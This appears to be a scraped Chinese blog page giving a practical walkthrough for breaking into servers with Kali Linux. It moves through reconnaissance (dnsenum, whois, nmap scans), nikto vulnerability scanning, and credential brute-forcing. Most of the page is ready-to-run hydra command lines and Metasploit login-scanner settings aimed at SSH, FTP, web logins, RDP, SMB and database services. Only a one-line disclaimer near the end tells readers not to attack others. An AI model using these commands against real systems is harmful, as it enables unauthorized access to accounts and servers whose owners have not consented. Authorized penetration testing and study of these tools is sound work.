kali入侵服务器的那一套实战

kali入侵服务器的那一套实战

dnsenum -enum xxxxx.com 枚举出网站的所有域名和服务器的ip地址

打开百度查询ip地址的所在地

whatweb xxxx.com 查看那些网站入口可以访问 以状态码为准

whois ip地址 查看ip所在地

nmap -sS ip 匿名查看服务器开放的端口

nmap -O或-A 查看服务器的什么系统

nmap -sV 查看服务器开放端口以及服务器版本

[nikto]

漏洞扫描-T 选项包含了许多小选项,-T 9 表示扫描sql注入漏洞0检查文件上传页面1检查web日志2检查错误配置或默认文件3检查信息泄露问题4检查XSS/Script/Html问题5从根目录检查是否存在可访问的文件6检查拒绝服务器问题7从任意文件检索是否存在可访问文件8检查是否存在系统命令执行漏洞9检查sql注入漏洞b识别安装的软件版本c检查源代码泄露问题x反向链接选项

nikto -h ip 普通扫描全部漏洞

nikto -h -h ip -p 端口号 扫描指定端口漏洞

nikto -h ip -C all all表示CGI目录猜解

nikto -h ip -T 9 扫描sql注入漏洞

知道漏洞后开始爆破

[hydra(九头蛇)]

-l 指定爆破帐号-w 指定每个县城的回应时间为10-P 指定密码字典-t 指定爆破线程-v 指定现实爆破过程-f 查找到第一个可以使用的id和密码的时候停止破解hydra -l root -w 10 -P passwd.txt -t 10 -f ip地址 sshhydra -L /home/chenglee/zidian/user.txt -P /home/chenglee/zidian/wordlist.TXT 192.168.137.133 mysqlhydra -L user.txt -P pass.txt -V -t 10 ssh://192.168.0.1:22 暴力破解: 参数: -R 继续从上一次进度接着破解 -S 大写,采用SSL链接 -s 小写,可通过这个参数指定非默认端口 -l 指定破解的用户,对特定用户破解 -L 指定用户名字典 -p 小写,指定密码破解,少用,一般是采用密码字典 -P 大写,指定密码字典 -e 可选选项,n:空密码试探,s:使用指定用户和密码试探 -C 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数 -M 指定目标列表文件一行一条 -o 指定结果输出文件 -f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解 -t 同时运行的线程数,默认为16 -w 设置最大超时的时间,单位秒,默认是30s -v /-V显示详细过程 各协议的具体命令: 格式+示例:

1、破解ssh: hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip ssh hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

2、破解ftp: hydra ip ftp -L 用户名字典 -P 密码字典 -t 线程(默认16) -vV hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

3、get方式提交,破解web登录: hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip http-get/admin/ hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get/admin/index.PHP

4、post方式提交,破解web登录: hydra --L 用户名字典 -P 密码字典 -s 80 ip http-post-form"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword" hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form"login.php:id=^USER^&passwd=^PASS^:wrong username orpassword" 参数说明: -t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,中的内容是表示错误猜解的返回信息提示</p> <p>5、破解https: hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 6、破解teamspeak: hydra -L 用户名字典 -P 密码字典 -s 端口号 -vV ip teamspeak 7、破解cisco: hydra -P pass.txt 10.36.16.18 cisco hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 8、破解smb: hydra -L 用户名字典 -P pass.txt 10.36.16.18 smb 9、破解pop3: hydra -l muts -P pass.txt my.pop3.mail pop3 10、破解rdp: hydra ip rdp -l administrator -P pass.txt -V 11、破解http-proxy: hydra -l admin -P pass.txt http-proxy://10.36.16.18-------------------------------------------------------------------Kali Linux(Metasploit口令猜解模块)</p> <p>Metasploit口令猜解模块——</p> <p>SSH服务口令猜解:</p> <p>msf > use auxiliary/scanner/ssh/ssh_login(使用ssh_login模块)</p> <p>msf auxiliary(ssh_login) > show options (查看选项)</p> <p>msf auxiliary(ssh_login) > set RHOSTS 10.107.0.99(目标)</p> <p>msf auxiliary(ssh_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)</p> <p>msf auxiliary(ssh_login) > set PASS_FILE /root/pass.txt(密码字典文件)</p> <p>msf auxiliary(ssh_login) > set THREADS 50(线程)</p> <p>msf auxiliary(ssh_login) > exploit (开始)</p> <p>Telnet口令猜解:</p> <p>msf > use auxiliary/scanner/telnet/telnet_login (使用telnet_login模块)</p> <p>msf auxiliary(telnet_login) > show options (查看选项)</p> <p>msf auxiliary(telnet_login) > set RHOSTS 10.180.100.141(目标)</p> <p>msf auxiliary(telnet_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)</p> <p>msf auxiliary(telnet_login) > set PASS_FILE /root/pass.txt(密码字典文件)</p> <p>msf auxiliary(telnet_login) > exploit (开始)</p> <p>Samba口令猜解:</p> <p>msf > use auxiliary/scanner/smb/smb_login (使用smb_login模块)</p> <p>msf auxiliary(smb_login) > show options (查看选项)</p> <p>msf auxiliary(smb_login) > set RHOSTS 10.180.100.10(目标)</p> <p>msf auxiliary(ssmb_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)</p> <p>msf auxiliary(ssmb_login) > set PASS_FILE /root/pass.txt(密码字典文件)</p> <p>msf auxiliary(ssmb_login) > exploit(开始)</p> <p>Mysql口令猜解:</p> <p>msf > use auxiliary/scanner/mysql/mysql_login (使用mysql_login模块)</p> <p>msf auxiliary(mysql_login) > show options (查看选项)</p> <p>msf auxiliary(mysql_login) > set RHOSTS 192.168.230.176(目标)</p> <p>msf auxiliary(mysql_login) > set USERNAME root(用户名字典,或指定用户)</p> <p>msf auxiliary(mysql_login) > set PASS_FILE /root/pass.txt(密码字典文件)</p> <p>msf auxiliary(mysql_login) > exploit(开始)</p> <p>Postgresq口令猜解:</p> <p>msf > use auxiliary/scanner/postgres/postgres_login (使用postgres_login模块)</p> <p>msf auxiliary(postgres_login) > show options (查看选项)</p> <p>msf auxiliary(postgres_login) > set RHOSTS 192.168.230.10(目标)</p> <p>msf auxiliary(postgres_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)</p> <p>msf auxiliary(postgres_login) > set PASS_FILE /root/pass.txt(密码字典文件)</p> <p>msf auxiliary(postgres_login) > exploit (开始)</p> <p>Mssql口令猜解:</p> <p>msf > use auxiliary/scanner/mssql/mssql_login (使用mssql_login 模块)</p> <p>msf auxiliary(mssql_login) > show options (查看选项)</p> <p>msf auxiliary(mssql_login) > set RHOSTS 10.107.0.64(目标)</p> <p>msf auxiliary(mssql_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)</p> <p>msf auxiliary(mssql_login) > set PASS_FILE /root/pass.txt(密码字典文件)</p> <p>msf auxiliary(mssql_login) > exploit(开始)</p> <p>Tomcat口令猜解:</p> <p>msf > use auxiliary/scanner/http/tomcat_mgr_login (使用tomcat_mgr_login模块)</p> <p>msf auxiliary(tomcat_mgr_login) > show options(查看选项)</p> <p>msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.230.176(目标)</p> <p>msf auxiliary(tomcat_mgr_login) > set USER_FILE username.txt(用户名字典,或指定用户)</p> <p>msf auxiliary(tomcat_mgr_login) > set PASS_FILE /root/pass.txt(密码字典文件)</p> <p>msf auxiliary(tomcat_mgr_login) > exploit(开始)</p> <p>hydra -l root -P /password.txt -vV -t 10 -f ip ssh</p> <p>也可以写一个python脚本爆破</p> <p>隆重声明注意自己的行为,不要搞别人,人外有人,天外有天!</p> </div> <div class="pagination"> <a href="/5e79444654f3ee27/6eb029a182ce9805.html">← 八种办法帮你解决OBS提示编码过载的问题——降低帧率篇</a> <a href="/5e79444654f3ee27/96093f875526ed16.html">WinRAR该装哪个盘? →</a> </div> </article> </div> <div class="main-content"> <h2 class="section-title">相关推荐</h2> <div class="article-grid"> <div class="article-card"> <img src="/0.jpg" alt="微信转账一年限额多少?" class="card-image"> <div class="card-body"> <span class="category-tag">365bet比分</span> <h3 class="card-title"><a href="/5e79444654f3ee27/b323361650c8aae6.html">微信转账一年限额多少?</a></h3> <div class="card-meta"> <span>📅 09-19</span> <span>👁️ 6865</span> </div> </div> </div> <div class="article-card"> <img src="/0.jpg" alt="没有找到站点" class="card-image"> <div class="card-body"> <span class="category-tag">中爱365APP</span> <h3 class="card-title"><a href="/aa7188178972bd42/44532c5e2b093a92.html">没有找到站点</a></h3> <div class="card-meta"> <span>📅 07-03</span> <span>👁️ 5782</span> </div> </div> </div> <div class="article-card"> <img src="/0.jpg" alt="如何在苹果手机上安全信任第三方应用?必备指南!" class="card-image"> <div class="card-body"> <span class="category-tag">365bet比分</span> <h3 class="card-title"><a href="/5e79444654f3ee27/ab0776c3dc8224ba.html">如何在苹果手机上安全信任第三方应用?必备指南!</a></h3> <div class="card-meta"> <span>📅 08-06</span> <span>👁️ 3345</span> </div> </div> </div> </div> </div> <div class="friend-links"> <h3>友情伙伴</h3> <div class="friend-links-container"> <script> var _mtj = _mtj || []; (function () { var mtj = document.createElement("script"); mtj.src = "https://node90.aizhantj.com:21233/tjjs/?k=1tjqoiqkcfv"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(mtj, s); })(); </script> </div> </div> </div> <footer> <div class="header-content"> <p class="copyright">Copyright © <span id="currentYear"></span> 365bet比分-365bet体育投注在线-中爱365APP All Rights Reserved.</p> </div> </footer> <script> document.getElementById('currentYear').textContent = new Date().getFullYear(); // 为文章图片添加孟菲斯风格装饰 document.addEventListener('DOMContentLoaded', function() { const images = document.querySelectorAll('.article-content img'); images.forEach(img => { const wrapper = document.createElement('div'); wrapper.style.position = 'relative'; wrapper.style.display = 'inline-block'; const deco1 = document.createElement('div'); deco1.style.position = 'absolute'; deco1.style.width = '30px'; deco1.style.height = '30px'; deco1.style.background = 'var(--memphis-blue)'; deco1.style.top = '-15px'; deco1.style.left = '-15px'; deco1.style.zIndex = '-1'; const deco2 = document.createElement('div'); deco2.style.position = 'absolute'; deco2.style.width = '20px'; deco2.style.height = '20px'; deco2.style.background = 'var(--memphis-pink)'; deco2.style.bottom = '-10px'; deco2.style.right = '-10px'; deco2.style.zIndex = '-1'; deco2.style.borderRadius = '50%'; img.parentNode.insertBefore(wrapper, img); wrapper.appendChild(img); wrapper.appendChild(deco1); wrapper.appendChild(deco2); }); }); </script> <script type='text/javascript' src='/api.js'></script> <script type='text/javascript' src='/tongji.js'></script> </body> </html>